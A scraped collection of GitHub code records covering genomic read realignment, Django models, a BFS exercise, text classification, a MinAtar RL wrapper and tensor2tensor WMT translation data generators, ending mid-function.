self.al_out = open(\n os.path.join(self.output_path, \"logs\", \"alignment.output.log\"), \"w\"\n )\n self.al_err = open(\n os.path.join(self.output_path, \"logs\", \"alignment.error.log\"), \"w\"\n )\n\n def realign(self, fasta_file_path, fastq1_path, fastq2_path, file_name):\n cmd = [\"samtools\", \"faidx\", fasta_file_path]\n\n # Python 3.4\n subprocess.call(cmd, stdout=self.al_out, stderr=self.al_err)\n\n indexed_fa_path = os.path.join(\n self.output_path, \"fasta_indexed\", file_name + \".indexed.fasta\"\n )\n\n cmd = [\"bowtie2-build\", fasta_file_path, indexed_fa_path]\n\n # Python 3.4\n subprocess.call(cmd, stdout=self.al_out, stderr=self.al_err)\n\n sam_path = os.path.join(\n self.output_path, os.path.join(\"sam\", file_name + \".sam\")\n )\n\n cmd = [\n \"bowtie2\",\n \"-X\",\n \"1000\",\n \"--local\",\n \"--phred33\",\n \"--sensitive\",\n \"-p\",\n \" 6\",\n \"-x\",\n indexed_fa_path,\n \"-1\",\n fastq1_path,\n \"-2\",\n fastq2_path,\n \"-S\",\n sam_path,\n ]\n\n # Python 3.4\n subprocess.call(cmd, stdout=self.al_out, stderr=self.al_err)\n\n bam_path = os.path.join(\n self.output_path, os.path.join(\"bam\", file_name + \".bam\")\n )\n\n cmd = [\"samtools\", \"view\", \"-b\", \"-o\", bam_path, sam_path]\n\n # Python 3.4\n subprocess.call(cmd, stdout=self.al_out, stderr=self.al_err)\n # Python 3.5\n # p = subprocess.run(cmd, stdout=al_out, stderr=al_err)\n # p.check_returncode() # change this to log errors\n\n bam_sorted_path = os.path.join(\n self.output_path, os.path.join(\"bam_sorted\", file_name + \".sort.bam\"),\n )\n\n cmd = [\"samtools\", \"sort\", \"-o\", bam_sorted_path, bam_path]\n\n # Python 3.4\n subprocess.call(cmd, stdout=self.al_out, stderr=self.al_err)\n\n bai_path = os.path.join(\n self.output_path, os.path.join(\"bam_sorted\", file_name + \".sort.bam.bai\"),\n )\n\n cmd = [\"samtools\", \"index\", bam_sorted_path, bai_path]\n\n # Python 3.4\n subprocess.call(cmd, stdout=self.al_out, stderr=self.al_err)\n\n cram_path = os.path.join(\n self.visualization_path, os.path.join(\"cram\", file_name + \".cram\")\n )\n cmd = [\n \"samtools\",\n \"view\",\n \"-T\",\n fasta_file_path,\n \"-C\",\n \"-o\",\n cram_path,\n bam_sorted_path,\n ]\n\n subprocess.call(cmd, stdout=self.al_out, stderr=self.al_err)\n\n cmd = [\"samtools\", \"index\", cram_path]\n\n subprocess.call(cmd, stdout=self.al_out, stderr=self.al_err)\n\n # dir_path = [\n # os.path.join(self.output_path, 'fastq'),\n # os.path.join(self.output_path, 'bam'),\n # os.path.join(self.output_path, 'sam'),\n # os.path.join(self.output_path, 'fasta_indexed')]\n # for cur_path in dir_path:\n # file_list = os.listdir(cur_path)\n # for fileName in file_list:\n # os.remove(cur_path + \"/\" + fileName)\n","repo_name":"FenyoLab/transposcope","sub_path":"transposcope/realigner.py","file_name":"realigner.py","file_ext":"py","file_size_in_byte":4222,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"5"} +{"seq_id":"11800251108","text":"import pandas as pd\nfrom datetime import datetime\n\ndef rank_targets(searches, search_urls, page, cached):\n '''\n Give the rankings of the searched websites and the rankings of specified targets\n\n Args:\n searches (list): list of searched items from scraping\n search_urls (list): list of corresponding urls\n page (list): list of page numbers\n cached (list): list of 1's and 0's identifying whether the link is cached\n\n Return:\n all_rankings (dataframe): ranking of each target in searched item in 'searches'\n\n '''\n\n # Rankings = index + 1 for all 
items\n    all_rankings = list(range(1,len(searches)+1))\n\n    # Strip stray '.' and ' ' characters (left by truncated titles) off each end\n    searches = [s.strip('... ') for s in searches]\n\n    # Construct the dataframe from the results\n    data_all = {'Name': searches,\n                'Rank': all_rankings,\n                'Page': page,\n                'URL': search_urls,\n                'Cached': cached\n                }\n    data_all['Date'] = datetime.now()\n\n    df_all = pd.DataFrame.from_dict(data_all)\n\n    return df_all\n","repo_name":"briantsai1317/web_scraping","sub_path":"rank_results.py","file_name":"rank_results.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"28911020910","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\nfrom django.conf import settings\nimport taggit.managers\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('taggit', '0002_auto_20150616_2121'),\n        migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n        ('main', '0011_v300_credential_domain_field'),\n    ]\n\n    operations = [\n        migrations.CreateModel(\n            name='Label',\n            fields=[\n                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n                ('created', models.DateTimeField(default=None, editable=False)),\n                ('modified', models.DateTimeField(default=None, editable=False)),\n                ('description', models.TextField(default=b'', blank=True)),\n                ('name', models.CharField(max_length=512)),\n                ('created_by', models.ForeignKey(related_name=\"{u'class': 'label', u'app_label': 'main'}(class)s_created+\", on_delete=django.db.models.deletion.SET_NULL, default=None, editable=False, to=settings.AUTH_USER_MODEL, null=True)),\n                ('modified_by', models.ForeignKey(related_name=\"{u'class': 'label', u'app_label': 'main'}(class)s_modified+\", on_delete=django.db.models.deletion.SET_NULL, default=None, editable=False, to=settings.AUTH_USER_MODEL, null=True)),\n                ('organization', models.ForeignKey(related_name='labels', to='main.Organization', help_text='Organization this label belongs to.')),\n                ('tags', taggit.managers.TaggableManager(to='taggit.Tag', through='taggit.TaggedItem', blank=True, help_text='A comma-separated list of tags.', verbose_name='Tags')),\n            ],\n            options={\n                'ordering': ('organization', 'name'),\n            },\n        ),\n        migrations.AddField(\n            model_name='activitystream',\n            name='label',\n            field=models.ManyToManyField(to='main.Label', blank=True),\n        ),\n        migrations.AddField(\n            model_name='job',\n            name='labels',\n            field=models.ManyToManyField(related_name='job_labels', to='main.Label', blank=True),\n        ),\n        migrations.AddField(\n            model_name='jobtemplate',\n            name='labels',\n            field=models.ManyToManyField(related_name='jobtemplate_labels', to='main.Label', blank=True),\n        ),\n        migrations.AlterUniqueTogether(\n            name='label',\n            unique_together=set([('name', 'organization')]),\n        ),\n    ]\n","repo_name":"wipro-sdx/Automation","sub_path":"venv/tower/lib/python2.7/site-packages/awx/main/migrations/0012_v300_create_labels.py","file_name":"0012_v300_create_labels.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"3713121099","text":"# 8-direction delta search\ndx = [0,0,1,-1,1,-1,-1,1]\ndy = [1,-1,0,0,1,-1,1,-1]\n\ndef BFS(x, y):\n    visited = [[0] * M for _ in range(N)]\n    queue = [(x, y)]\n    visited[x][y] = 1\n    num = 0\n    while queue:\n        sx, sy = queue.pop(0)\n        for k in range(8):\n            nx, ny = sx + dx[k], sy + dy[k]\n
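            # enqueue only in-bounds cells that have not been visited yet\n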
            if 0 <= nx < N and 0 <= ny < M and visited[nx][ny]==0:\n                queue.append((nx, ny))\n                visited[nx][ny] = visited[sx][sy] + 1\n\n    return visited\n\nN, M = map(int, (input().split()))\narr = [list(map(int, input().split())) for _ in range(N)]\n\n# store the positions of all sharks\nshark = []\nfor i in range(N):\n    for j in range(M):\n        if arr[i][j] == 1:\n            shark.append((i, j))\nprint(shark)\n\n# take each stored (row, col) tuple and unpack it into sx, sy\nfor sx, sy in shark:\n    print(BFS(sx, sy))","repo_name":"SWan9710/baekjoon_problem","sub_path":"새 폴더/[BOJ]17086_아기상어2.py","file_name":"[BOJ]17086_아기상어2.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"30386980961","text":"# -*- coding:utf-8 -*-\n\nimport zipfile\nimport os\nfrom pyhanlp.static import download, remove_file\n\nfrom pyhanlp import SafeJClass\nimport time\n\nNaiveBayesClassifier = SafeJClass('com.hankcs.hanlp.classification.classifiers.NaiveBayesClassifier')\nIOUtil = SafeJClass('com.hankcs.hanlp.corpus.io.IOUtil')\nFileset = SafeJClass('com.hankcs.hanlp.classification.corpus.FileDataSet')\n\n\ndef test_data_path():\n    this_dir = os.getcwd()\n    data_path = os.path.join(this_dir, 'data')\n    if os.path.isdir(data_path):\n        return data_path\n    data_path = os.path.join(this_dir[:this_dir.find('pyhanlp')], 'pyhanlp', 'tests', 'data')\n    if os.path.isdir(data_path):\n        return data_path\n    raise FileNotFoundError('找不到测试data目录,请在项目根目录下运行测试脚本')\n\n\ndef ensure_data(data_name, data_url):\n    root_path = test_data_path()\n    dest_path = os.path.join(root_path, data_name)\n    if os.path.exists(dest_path):\n        print(dest_path)\n        return dest_path\n    if data_url.endswith('.zip'):\n        dest_path += '.zip'\n    download(data_url, dest_path)\n    if data_url.endswith('.zip'):\n        with zipfile.ZipFile(dest_path, \"r\") as archive:\n            archive.extractall(root_path)\n        remove_file(dest_path)\n        dest_path = dest_path[:-len('.zip')]\n    return dest_path\n\n\ndef train_or_load_classifier():\n    corpus_path = ensure_data('搜狗文本分类语料库迷你版',\n                              'http://hanlp.linrunsoft.com/release/corpus/sogou-text-classification-corpus-mini.zip')\n    model_path = corpus_path + '.ser'\n\n    fileset = Fileset(corpus_path)\n    if os.path.isfile(model_path):\n        return NaiveBayesClassifier(IOUtil.readObjectFrom(model_path))\n    classifier = NaiveBayesClassifier()\n    classifier.train(fileset)\n    model = classifier.getModel()\n    IOUtil.saveObjectTo(model, model_path)\n    return classifier\n\n\ndef predict(classifier, text):\n    print(\"《%16s》\\t属于分类\\t【%s】\" % (text, classifier.classify(text)))\n\n\nif __name__ == '__main__':\n    t1 = time.time()\n    classifier = train_or_load_classifier()\n    predict(classifier, \"C罗压梅西内马尔蝉联金球奖\")\n    predict(classifier, \"英国造航母耗时8年仍未服役 被中国速度远远甩在身后\")\n    predict(classifier, \"研究生考录模式亟待进一步专业化\")\n    predict(classifier, \"如果真想用食物解压,建议可以食用燕麦\")\n    predict(classifier, \"通用及其部分竞争对手目前正在考虑解决库存问题\")\n    predict(classifier, \"英国简氏防务网站\")\n    predict(classifier, \"一种风险或陷阱\")\n    # predict(classifier, \"孔子是中国古代伟大的思想家、政治家、教育家,儒家学派创始人\")\n    t2 = time.time()\n    print(\"耗时:\", t2 - t1)\n","repo_name":"clnFind/NLPLearning","sub_path":"hanlp/hanlp_test1.py","file_name":"hanlp_test1.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"10653014440","text":"################################################################################\n\"\"\"\nDJ JOE Website Playlist File Generator\n--------------------------------------\n\n(c) 2021 - Stanley Solutions - Joe Stanley\n\nThis application serves an interface to allow the 
recording of Apple Music or\nSpotify playlists.\n\"\"\"\n################################################################################\n\nimport sys\nfrom pathlib import Path\n\nBASE = str(Path(__file__).parent.parent / \"app\")\n\nsys.path.insert(0, BASE)\n\n\nfrom spotify_client import SpotifyPlaylister\n\n\ndef test_client_doesnt_crash():\n \"\"\"Just make sure the Spotify Client doesn't die.\"\"\"\n playlister = SpotifyPlaylister(url=(\n \"https://open.spotify.com/playlist/3KHb0WRmzbp9WH7E2mXVmx?si=fa8f7abb94d74345\"\n ))\n print(playlister())\n\n\n# END\n","repo_name":"engineerjoe440/djjoeplaylister","sub_path":"test/test_spotify_client.py","file_name":"test_spotify_client.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"13103765837","text":"# -*- coding: utf-8 -*-\n# author: itimor\n\nfrom django.contrib import admin\nfrom football.models import Duqiu\n\n@admin.register(Duqiu)\nclass DuqiuAdmin(admin.ModelAdmin):\n # 显示在管理页面的字段\n list_display = ('name', 'profit', 'win_item_company', 'win_item_cw_odds', 'win_percentage', 'draw_item_company', 'draw_item_cw_odds', 'draw_percentage', 'lose_item_company', 'lose_item_cw_odds', 'lose_percentage')\n # 定制过滤器\n list_filter = ('win_item_company','draw_item_company','lose_item_company')\n # 可查询字段\n search_fields = ('name',)\n # 可以修改内容的链接\n list_display_links = ['name']\n # 排序\n ordering = ('profit',)","repo_name":"itimor/treenew","sub_path":"football/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"1549968450","text":"\"\"\"\nCP1404/CP5632 Practical\nHex colour codes in a dictionary\nKeZhang\n\"\"\"\nNAME_TO_COLOUR_CODE = {\"absolute zero\": \"#0048ba\", \"acid green\": \"#b0bf1a\", \"aliceblue\": \"#f0f8ff\",\n \"alizarin crimson\": \"#e32636\",\n \"amaranth\": \"#e52b50\", \"amber\": \"#ffbf00\", \"amethyst\": \"#9966cc\", \"antiquewhite\": \"#faebd7\",\n \"apricot\": \"#fbceb1\", \"Aqua\": \"#00ffff\"}\n\n\ndef main():\n print_formatted_colour_codes(NAME_TO_COLOUR_CODE)\n colour_name = input(\"Enter colour name: \").lower()\n while colour_name != \"\":\n if colour_name in NAME_TO_COLOUR_CODE:\n print(colour_name, \"is\", NAME_TO_COLOUR_CODE[colour_name])\n else:\n print(\"Invalid colour name!\")\n print_formatted_colour_codes(NAME_TO_COLOUR_CODE)\n colour_name = input(\"Enter colour name: \").lower()\n\n\ndef print_formatted_colour_codes(code_to_name):\n \"\"\"Print name and code of colour in format.\"\"\"\n for name, code in code_to_name.items():\n print(f'{name} is {code}')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"technical-zebra/CP1404_practicals","sub_path":"prac5_KeZhang/hex_colours.py","file_name":"hex_colours.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"11464348212","text":"import numpy as np\nfrom torch import nn\nimport torch.nn.functional as F\n\nimport gym\nfrom minatar import Environment\n\nfrom super_sac import nets\n\n\nclass MinAtarEnv(gym.Wrapper):\n def __init__(self, *args, **kwargs):\n self.env = Environment(*args, **kwargs)\n self.env.action_space = gym.spaces.Discrete(6)\n self.env.observation_space = None\n self.env.reward_range = None\n self.env.metadata = None\n super().__init__(self.env)\n\n def reset(self):\n self.env.reset()\n return 
self.env.state().astype(np.uint8).transpose(2, 0, 1)\n\n def step(self, act):\n reward, done = self.env.act(act)\n state = self.env.state().astype(np.uint8).transpose(2, 0, 1)\n return state, reward, done, {}\n\n @property\n def num_channels(self):\n return self.env.state_shape()[-1]\n\n def render(self, *args, **kwargs):\n self.env.display_state()\n\n\nclass MinAtarEncoder(nets.Encoder):\n def __init__(self, channels, emb_dim=50):\n super().__init__()\n self._dim = emb_dim\n self.conv1 = nn.Conv2d(channels, 16, kernel_size=3, stride=1)\n self.conv2 = nn.Conv2d(16, 16, kernel_size=2, stride=1)\n\n output_height, output_width = nets.cnns.compute_conv_output(\n (10, 10), kernel_size=(3, 3), stride=(1, 1)\n )\n output_height, output_width = nets.cnns.compute_conv_output(\n (output_height, output_width), kernel_size=(2, 2), stride=(1, 1)\n )\n self.fc = nn.Linear(output_height * output_width * 16, emb_dim)\n self.apply(nets.weight_init)\n\n @property\n def embedding_dim(self):\n return self._dim\n\n def forward(self, obs_dict):\n img = obs_dict[\"obs\"]\n x = F.relu(self.conv1(img))\n x = F.relu(self.conv2(x))\n x = x.view(x.size(0), -1)\n state = self.fc(x)\n return state\n","repo_name":"jakegrigsby/super_sac","sub_path":"experiments/minatar/minatar_utils.py","file_name":"minatar_utils.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"5"} +{"seq_id":"33884465156","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport tarfile\n\n# Dependency imports\n\nfrom tensor2tensor.data_generators import generator_utils\nfrom tensor2tensor.data_generators import problem\nfrom tensor2tensor.data_generators import text_encoder\nfrom tensor2tensor.data_generators import wsj_parsing\nfrom tensor2tensor.utils import registry\n\nimport tensorflow as tf\n\ntf.flags.DEFINE_string(\"ende_bpe_path\", \"\", \"Path to BPE files in tmp_dir.\"\n \"Download from https://drive.google.com/open?\"\n \"id=0B_bZck-ksdkpM25jRUN2X2UxMm8\")\n\nFLAGS = tf.flags.FLAGS\n\n\n# End-of-sentence marker.\nEOS = text_encoder.EOS_ID\n\n\ndef _default_token_feature_encoders(data_dir, target_vocab_size):\n vocab_filename = os.path.join(data_dir,\n \"vocab.endefr.%d\" % target_vocab_size)\n subtokenizer = text_encoder.SubwordTextEncoder(vocab_filename)\n return {\n \"inputs\": subtokenizer,\n \"targets\": subtokenizer,\n }\n\n\ndef _default_character_feature_encoders():\n return {\n \"inputs\": text_encoder.ByteTextEncoder(),\n \"targets\": text_encoder.ByteTextEncoder(),\n }\n\n\nclass WMTProblem(problem.Problem):\n \"\"\"Base class for WMT problems.\"\"\"\n\n @property\n def is_character_level(self):\n return False\n\n @property\n def targeted_vocab_size(self):\n raise NotImplementedError() # Not needed if self.is_character_level.\n\n @property\n def train_generator(self):\n \"\"\"Generator; takes data_dir, tmp_dir, is_training, targeted_vocab_size.\"\"\"\n raise NotImplementedError()\n\n @property\n def dev_generator(self):\n return self.train_generator\n\n @property\n def input_space_id(self):\n raise NotImplementedError()\n\n @property\n def target_space_id(self):\n raise NotImplementedError()\n\n @property\n def num_shards(self):\n return 100\n\n def generate_data(self, data_dir, tmp_dir, num_shards=None):\n if num_shards is None:\n num_shards = self.num_shards\n if self.is_character_level:\n generator_utils.generate_dataset_and_shuffle(\n 
self.train_generator(tmp_dir, True),\n self.training_filepaths(data_dir, num_shards, shuffled=False),\n self.dev_generator(tmp_dir, False),\n self.dev_filepaths(data_dir, 1, shuffled=False))\n else:\n generator_utils.generate_dataset_and_shuffle(\n self.train_generator(data_dir, tmp_dir, True,\n self.targeted_vocab_size),\n self.training_filepaths(data_dir, num_shards, shuffled=False),\n self.dev_generator(data_dir, tmp_dir, False,\n self.targeted_vocab_size),\n self.dev_filepaths(data_dir, 1, shuffled=False))\n\n def feature_encoders(self, data_dir):\n if self.is_character_level:\n return _default_character_feature_encoders()\n return _default_token_feature_encoders(data_dir, self.targeted_vocab_size)\n\n def hparams(self, defaults, unused_model_hparams):\n p = defaults\n if self.is_character_level:\n source_vocab_size = 256\n target_vocab_size = 256\n else:\n source_vocab_size = self._encoders[\"inputs\"].vocab_size\n target_vocab_size = self._encoders[\"targets\"].vocab_size\n p.input_modality = {\"inputs\": (registry.Modalities.SYMBOL,\n source_vocab_size)}\n p.target_modality = (registry.Modalities.SYMBOL, target_vocab_size)\n p.input_space_id = self.input_space_id\n p.target_space_id = self.target_space_id\n if self.is_character_level:\n p.loss_multiplier = 2.0\n\n\n# Generic generators used later for multiple problems.\n\n\ndef character_generator(source_path, target_path, character_vocab, eos=None):\n \"\"\"Generator for sequence-to-sequence tasks that just uses characters.\n\n This generator assumes the files at source_path and target_path have\n the same number of lines and yields dictionaries of \"inputs\" and \"targets\"\n where inputs are characters from the source lines converted to integers,\n and targets are characters from the target lines, also converted to integers.\n\n Args:\n source_path: path to the file with source sentences.\n target_path: path to the file with target sentences.\n character_vocab: a TextEncoder to encode the characters.\n eos: integer to append at the end of each sequence (default: None).\n\n Yields:\n A dictionary {\"inputs\": source-line, \"targets\": target-line} where\n the lines are integer lists converted from characters in the file lines.\n \"\"\"\n eos_list = [] if eos is None else [eos]\n with tf.gfile.GFile(source_path, mode=\"r\") as source_file:\n with tf.gfile.GFile(target_path, mode=\"r\") as target_file:\n source, target = source_file.readline(), target_file.readline()\n while source and target:\n source_ints = character_vocab.encode(source.strip()) + eos_list\n target_ints = character_vocab.encode(target.strip()) + eos_list\n yield {\"inputs\": source_ints, \"targets\": target_ints}\n source, target = source_file.readline(), target_file.readline()\n\n\ndef tabbed_generator(source_path, source_vocab, target_vocab, eos=None):\n \"\"\"Generator for sequence-to-sequence tasks using tabbed files.\n\n Tokens are derived from text files where each line contains both\n a source and a target string. The two strings are separated by a tab\n character ('\\t'). 
It yields dictionaries of \"inputs\" and \"targets\" where\n  inputs are characters from the source lines converted to integers, and\n  targets are characters from the target lines, also converted to integers.\n\n  Args:\n    source_path: path to the file with source and target sentences.\n    source_vocab: a SubwordTextEncoder to encode the source string.\n    target_vocab: a SubwordTextEncoder to encode the target string.\n    eos: integer to append at the end of each sequence (default: None).\n\n  Yields:\n    A dictionary {\"inputs\": source-line, \"targets\": target-line} where\n    the lines are integer lists converted from characters in the file lines.\n  \"\"\"\n  eos_list = [] if eos is None else [eos]\n  with tf.gfile.GFile(source_path, mode=\"r\") as source_file:\n    for line in source_file:\n      if line and \"\\t\" in line:\n        parts = line.split(\"\\t\", maxsplit=1)\n        source, target = parts[0].strip(), parts[1].strip()\n        source_ints = source_vocab.encode(source) + eos_list\n        target_ints = target_vocab.encode(target) + eos_list\n        yield {\"inputs\": source_ints, \"targets\": target_ints}\n\n\ndef token_generator(source_path, target_path, token_vocab, eos=None):\n  \"\"\"Generator for sequence-to-sequence tasks that uses tokens.\n\n  This generator assumes the files at source_path and target_path have\n  the same number of lines and yields dictionaries of \"inputs\" and \"targets\"\n  where inputs are token ids from the \" \"-split source (and target, resp.) 
lines\n converted to integers using the token_map.\n\n Args:\n source_path: path to the file with source sentences.\n target_path: path to the file with target sentences.\n source_token_vocab: text_encoder.TextEncoder object.\n target_token_vocab: text_encoder.TextEncoder object.\n eos: integer to append at the end of each sequence (default: None).\n\n Yields:\n A dictionary {\"inputs\": source-line, \"targets\": target-line} where\n the lines are integer lists converted from tokens in the file lines.\n \"\"\"\n eos_list = [] if eos is None else [eos]\n with tf.gfile.GFile(source_path, mode=\"r\") as source_file:\n with tf.gfile.GFile(target_path, mode=\"r\") as target_file:\n source, target = source_file.readline(), target_file.readline()\n while source and target:\n source_ints = source_token_vocab.encode(source.strip()) + eos_list\n target_ints = target_token_vocab.encode(target.strip()) + eos_list\n yield {\"inputs\": source_ints, \"targets\": target_ints}\n source, target = source_file.readline(), target_file.readline()\n\n\n# Data-set URLs.\n\n\n_ENDE_TRAIN_DATASETS = [\n [\n \"http://data.statmt.org/wmt16/translation-task/training-parallel-nc-v11.tgz\", # pylint: disable=line-too-long\n (\"training-parallel-nc-v11/news-commentary-v11.de-en.en\",\n \"training-parallel-nc-v11/news-commentary-v11.de-en.de\")\n ],\n [\n \"http://www.statmt.org/wmt13/training-parallel-commoncrawl.tgz\",\n (\"commoncrawl.de-en.en\", \"commoncrawl.de-en.de\")\n ],\n [\n \"http://www.statmt.org/wmt13/training-parallel-europarl-v7.tgz\",\n (\"training/europarl-v7.de-en.en\", \"training/europarl-v7.de-en.de\")\n ],\n]\n_ENDE_TEST_DATASETS = [\n [\n \"http://data.statmt.org/wmt16/translation-task/dev.tgz\",\n (\"dev/newstest2013.en\", \"dev/newstest2013.de\")\n ],\n]\n\n_ENFR_TRAIN_DATASETS = [\n [\n \"http://www.statmt.org/wmt13/training-parallel-commoncrawl.tgz\",\n (\"commoncrawl.fr-en.en\", \"commoncrawl.fr-en.fr\")\n ],\n [\n \"http://www.statmt.org/wmt13/training-parallel-europarl-v7.tgz\",\n (\"training/europarl-v7.fr-en.en\", \"training/europarl-v7.fr-en.fr\")\n ],\n [\n \"http://www.statmt.org/wmt14/training-parallel-nc-v9.tgz\",\n (\"training/news-commentary-v9.fr-en.en\",\n \"training/news-commentary-v9.fr-en.fr\")\n ],\n [\n \"http://www.statmt.org/wmt10/training-giga-fren.tar\",\n (\"giga-fren.release2.fixed.en.gz\", \"giga-fren.release2.fixed.fr.gz\")\n ],\n [\n \"http://www.statmt.org/wmt13/training-parallel-un.tgz\",\n (\"un/undoc.2000.fr-en.en\", \"un/undoc.2000.fr-en.fr\")\n ],\n]\n_ENFR_TEST_DATASETS = [\n [\n \"http://data.statmt.org/wmt16/translation-task/dev.tgz\",\n (\"dev/newstest2013.en\", \"dev/newstest2013.fr\")\n ],\n]\n\n_ZHEN_TRAIN_DATASETS = [[(\"http://data.statmt.org/wmt17/translation-task/\"\n \"training-parallel-nc-v12.tgz\"),\n (\"training/news-commentary-v12.zh-en.zh\",\n \"training/news-commentary-v12.zh-en.en\")]]\n\n_ZHEN_TEST_DATASETS = [[\n \"http://data.statmt.org/wmt17/translation-task/dev.tgz\",\n (\"dev/newsdev2017-zhen-src.zh\", \"dev/newsdev2017-zhen-ref.en\")\n]]\n\n# For Macedonian-English the SETimes corpus\n# from http://nlp.ffzg.hr/resources/corpora/setimes/ is used.\n# The original dataset has 207,777 parallel sentences.\n# For training the first 205,777 sentences are used.\n_MKEN_TRAIN_DATASETS = [[\n \"https://github.com/stefan-it/nmt-mk-en/raw/master/data/setimes.mk-en.train.tgz\", # pylint: disable=line-too-long\n (\"train.mk\", \"train.en\")\n]]\n\n# For development 1000 parallel sentences are used.\n_MKEN_TEST_DATASETS = [[\n 
\"https://github.com/stefan-it/nmt-mk-en/raw/master/data/setimes.mk-en.dev.tgz\", # pylint: disable=line-too-long\n (\"dev.mk\", \"dev.en\")\n]]\n\n\n# Generators.\n\n\ndef _get_wmt_ende_dataset(directory, filename):\n \"\"\"Extract the WMT en-de corpus `filename` to directory unless it's there.\"\"\"\n train_path = os.path.join(directory, filename)\n if not (tf.gfile.Exists(train_path + \".de\") and\n tf.gfile.Exists(train_path + \".en\")):\n # We expect that this file has been downloaded from:\n # https://drive.google.com/open?id=0B_bZck-ksdkpM25jRUN2X2UxMm8 and placed\n # in `directory`.\n corpus_file = os.path.join(directory, FLAGS.ende_bpe_path)\n with tarfile.open(corpus_file, \"r:gz\") as corpus_tar:\n corpus_tar.extractall(directory)\n return train_path\n\n\ndef ende_bpe_token_generator(data_dir, tmp_dir, train):\n \"\"\"Instance of token generator for the WMT en->de task, training set.\"\"\"\n dataset_path = (\"train.tok.clean.bpe.32000\"\n if train else \"newstest2013.tok.bpe.32000\")\n train_path = _get_wmt_ende_dataset(tmp_dir, dataset_path)\n token_tmp_path = os.path.join(tmp_dir, \"vocab.bpe.32000\")\n token_path = os.path.join(data_dir, \"vocab.bpe.32000\")\n tf.gfile.Copy(token_tmp_path, token_path, overwrite=True)\n token_vocab = text_encoder.TokenTextEncoder(vocab_filename=token_path)\n return token_generator(train_path + \".en\", train_path + \".de\", token_vocab,\n EOS)\n\n\ndef _compile_data(tmp_dir, datasets, filename):\n \"\"\"Concatenate all `datasets` and save to `filename`.\"\"\"\n filename = os.path.join(tmp_dir, filename)\n with tf.gfile.GFile(filename + \".lang1\", mode=\"w\") as lang1_resfile:\n with tf.gfile.GFile(filename + \".lang2\", mode=\"w\") as lang2_resfile:\n for dataset in datasets:\n url = dataset[0]\n compressed_filename = os.path.basename(url)\n compressed_filepath = os.path.join(tmp_dir, compressed_filename)\n\n lang1_filename, lang2_filename = dataset[1]\n lang1_filepath = os.path.join(tmp_dir, lang1_filename)\n lang2_filepath = os.path.join(tmp_dir, lang2_filename)\n\n if not os.path.exists(compressed_filepath):\n generator_utils.maybe_download(tmp_dir, compressed_filename, url)\n if not (os.path.exists(lang1_filepath) and\n os.path.exists(lang2_filepath)):\n mode = \"r:gz\" if \"gz\" in compressed_filepath else \"r\"\n with tarfile.open(compressed_filepath, mode) as corpus_tar:\n corpus_tar.extractall(tmp_dir)\n if \".gz\" in lang1_filepath:\n new_filepath = lang1_filepath.strip(\".gz\")\n generator_utils.gunzip_file(lang1_filepath, new_filepath)\n lang1_filepath = new_filepath\n if \".gz\" in lang2_filepath:\n new_filepath = lang2_filepath.strip(\".gz\")\n generator_utils.gunzip_file(lang2_filepath, new_filepath)\n lang2_filepath = new_filepath\n with tf.gfile.GFile(lang1_filepath, mode=\"r\") as lang1_file:\n with tf.gfile.GFile(lang2_filepath, mode=\"r\") as lang2_file:\n line1, line2 = lang1_file.readline(), lang2_file.readline()\n while line1 or line2:\n lang1_resfile.write(line1.strip() + \"\\n\")\n lang2_resfile.write(line2.strip() + \"\\n\")\n line1, line2 = lang1_file.readline(), lang2_file.readline()\n\n return filename\n\n\ndef ende_wordpiece_token_generator(data_dir, tmp_dir, train, vocab_size):\n symbolizer_vocab = generator_utils.get_or_generate_vocab(\n data_dir, tmp_dir, \"vocab.endefr.%d\" % vocab_size, vocab_size)\n datasets = _ENDE_TRAIN_DATASETS if train else _ENDE_TEST_DATASETS\n tag = \"train\" if train else \"dev\"\n data_path = _compile_data(tmp_dir, datasets, \"wmt_ende_tok_%s\" % tag)\n return 
  return token_generator(data_path + \".lang1\", data_path + \".lang2\",\n                         symbolizer_vocab, EOS)\n\ndef sequence_token_generator(data_dir, tmp_dir, train, vocab_size):\n  symbolizer_vocab = generator_utils.seq_get_or_generate_vocab(\n      data_dir, tmp_dir, \"vocab.endefr.%d\" % vocab_size, vocab_size)\n  #datasets = _ENDE_TRAIN_DATASETS if train else _ENDE_TEST_DATASETS\n  #tag = \"train\" if train else \"dev\"\n  #data_path = _compile_data(tmp_dir, datasets, \"wmt_ende_tok_%s\" % tag)\n\n  if train:\n    return token_generator('t2t_split_data/input_train.txt', 't2t_split_data/target_train.txt',\n                           symbolizer_vocab, EOS)\n  else:\n    return token_generator('t2t_split_data/input_test.txt', 't2t_split_data/target_test.txt',\n                           symbolizer_vocab, EOS)\n\n\n@registry.register_problem(\"wmt_ende_tokens_8k\")\nclass WMTEnDeTokens8k(WMTProblem):\n  \"\"\"Problem spec for WMT En-De translation.\"\"\"\n\n  @property\n  def targeted_vocab_size(self):\n    return 2**13 # 8192\n\n  @property\n  def train_generator(self):\n    return ende_wordpiece_token_generator\n\n  @property\n  def input_space_id(self):\n    return 